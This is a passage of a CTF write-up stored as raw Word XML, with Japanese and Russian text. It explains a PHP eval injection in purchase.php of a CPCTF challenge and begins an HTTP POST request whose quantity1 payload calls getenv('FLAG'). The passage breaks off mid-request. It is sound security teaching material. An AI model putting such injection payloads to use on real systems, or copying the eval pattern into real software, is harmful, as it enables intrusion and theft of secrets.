                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>purchase.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
              <w:t>に</w:t>
            </w:r>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;td&gt;&lt;?=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>eval</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>('return ' . $_POST["quantity1"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>] .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> '*1000;')?&gt;&lt;/td&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
              <w:t>というのがあり</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:hyperlink r:id="rId8" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="005D5EA8">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>php</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
              <w:t>コマンドがインジェクションできる感じになっていた</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005D5EA8" w:rsidRPr="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:shd w:val="clear" w:color="auto" w:fill="242424"/>
              <w:spacing w:before="0" w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>getenv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>('FLAG')</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
              <w:t>でフラグが抜けるので不要部分を消すためにコメントを末尾につける感じで以下のようなリク</w:t>
            </w:r>
            <w:hyperlink r:id="rId9" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
                </w:rPr>
                <w:t>エス</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
              <w:t>トを送ればフラグが得られる</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">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Исходный код предоставляется.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="303134"/>
              <w:spacing w:line="540" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t>Dockerfile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve"> имеет ENV FLAG=CPCTF{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t>dummy_flag</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t>}, поэтому вы можете получить переменную среды.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="303134"/>
              <w:spacing w:line="540" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t>В</w:t>
            </w:r>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>purchase.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t>есть</w:t>
            </w:r>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;td</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&gt;&lt;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>?=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>eval</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">('return ' . </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t>$_POST["quantity1"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t>] .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve"> '*1000;')</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t>?&gt;&lt;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t>td</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt;, и можно внедрить команду </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve"> .Это начало ощущаться.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="303134"/>
              <w:spacing w:line="540" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="303134"/>
              <w:spacing w:line="540" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve">Поскольку флаг удаляется с помощью </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t>getenv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="y2iqfc"/>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
                <w:color w:val="E8EAED"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t>('FLAG'), вы можете получить его, отправив запрос, подобный приведенному ниже, добавив в конце комментарий для удаления ненужных частей.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005D5EA8" w:rsidRPr="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="303134"/>
              <w:spacing w:line="540" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D5EA8" w:rsidTr="005D5EA8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8">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Verdana" w:hAnsi="Verdana" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Long Solution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D5EA8" w:rsidRPr="005D5EA8" w:rsidTr="005D5EA8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="005D5EA8" w:rsidRPr="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>POST /purchase.php HTTP/2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005D5EA8" w:rsidRPr="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>lets-buy-some-array.web.cpctf</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.space</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005D5EA8" w:rsidRPr="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Content-Length: 51</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005D5EA8" w:rsidRPr="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005D5EA8" w:rsidRPr="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005D5EA8" w:rsidRPr="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>quantity1=getenv('FLAG</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>');/</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
